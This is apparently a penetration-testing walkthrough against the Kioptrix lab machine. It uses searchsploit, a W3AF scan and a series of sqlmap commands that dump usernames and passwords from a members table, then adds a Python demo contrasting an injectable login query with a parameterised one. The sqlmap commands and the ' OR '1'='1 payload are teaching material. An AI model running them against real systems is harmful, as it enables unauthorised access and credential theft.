1. Finding related vulnerabilities in the target system
In the previous penetration testing post, methods for collecting information about the target system were introduced. Next, continuing with the Kioptrix target machine as the example, the process of exploiting a related vulnerability is described in detail.
On the exploit-db.com website you can generally find valuable information about a known vulnerability together with proof-of-concept (POC) code that demonstrates it. The proof-of-concept code helps you understand the rationale and mechanism of the vulnerability, so you can determine whether your safeguards actually work.
2. Offline Vulnerability Library
Kali Linux ships with an offline copy of the Exploit-DB vulnerability library under /usr/share/exploitdb/. Use the searchsploit command to search it for vulnerabilities:
# searchsploit samba
This lists vulnerability information for various Samba server versions. Reviewing it carefully, there is no entry for Samba 3.0.28a, the version running on our target system (shown in the last scan of the previous post). In that case we can search online, or update the local vulnerability library; this is not covered in detail here.
3. Using the W3AF tool
W3AF is a powerful web vulnerability scanner. Here is how to use it. Enter w3af_gui in the Kali Linux terminal to launch its GUI version.
Then select "Full_audit" in the scan config, tick the bruteforce plug-in, enter the URL of the target machine in the Target address bar and click "Start" to begin the scan.
You can view the scan logs in the Log tab.
In the Results tab you can view the scan results. Some vulnerabilities are flagged in red: a sqli (SQL injection) vulnerability and a click_jacking vulnerability. These are vulnerabilities that can be exploited.
4. Using Sqlmap for SQL injection
1) Use the sqlmap command to dump the database information needed for the intrusion.
# sqlmap -u 192.168.50.102/checklogin.php --data mypassword=1
NOTE: The login service on 192.168.50.102 uses the POST method; the --data option is followed by the content to be sent.
Use the following command to list all databases (the --dbs option requests the database names):
sqlmap -u http://192.168.50.102/checklogin.php --data mypassword=1 --dbs
To list the tables in the members database:
sqlmap -u http://192.168.50.102/checklogin.php --data mypassword=1 -D members --tables
List the columns of the members table:
sqlmap -u http://192.168.50.102/checklogin.php --data mypassword=1 -D members -T members --columns
Dump the username and password columns of the table:
# sqlmap -u http://192.168.50.102/checklogin.php --data mypassword=1 -D members -T members -C username,password --dump
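To see why the sqli finding above is exploitable and how it is fixed, here is an added example that is not from the original post: a Python/sqlite3 stand-in for a checklogin.php-style query that concatenates the mypassword parameter into SQL, beside the same check written with bound parameters. The members table contents, the hypothetical username parameter and the function names are constructed for the demo.

```python
import sqlite3


def make_db():
    """In-memory stand-in for the target's members table (rows are constructed)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE members (username TEXT, password TEXT)")
    conn.executemany(
        "INSERT INTO members VALUES (?, ?)",
        [("admin", "adminpass-placeholder"), ("john", "johnpass-placeholder")],
    )
    return conn


def login_vulnerable(conn, username, mypassword):
    """Mirrors a checklogin.php-style check: user input is spliced into the SQL text,
    so a quote in mypassword changes the query's structure instead of its data."""
    sql = (
        "SELECT username FROM members WHERE username = '%s' AND password = '%s'"
        % (username, mypassword)
    )
    return conn.execute(sql).fetchone() is not None


def login_hardened(conn, username, mypassword):
    """Same check with bound parameters: the driver sends the values separately,
    so the input can only ever be compared as data. (Plaintext comparison is kept
    only to match the demo schema; a real login would compare a password hash.)"""
    sql = "SELECT username FROM members WHERE username = ? AND password = ?"
    return conn.execute(sql, (username, mypassword)).fetchone() is not None


def demo():
    """Run both checks with a legitimate password and with a tautology payload."""
    conn = make_db()
    tautology = "' OR '1'='1"  # turns the WHERE clause into (... AND '') OR TRUE
    return {
        "vuln_legit": login_vulnerable(conn, "admin", "adminpass-placeholder"),
        "vuln_injected": login_vulnerable(conn, "nobody", tautology),
        "hard_legit": login_hardened(conn, "admin", "adminpass-placeholder"),
        "hard_injected": login_hardened(conn, "nobody", tautology),
    }


if __name__ == "__main__":
    for name, ok in demo().items():
        print(f"{name}: {'login accepted' if ok else 'login rejected'}")
```

The vulnerable version accepts the bogus login because the injected quote closes the password literal and appends an always-true condition; the parameterised version rejects it because the whole payload is compared as a literal password string.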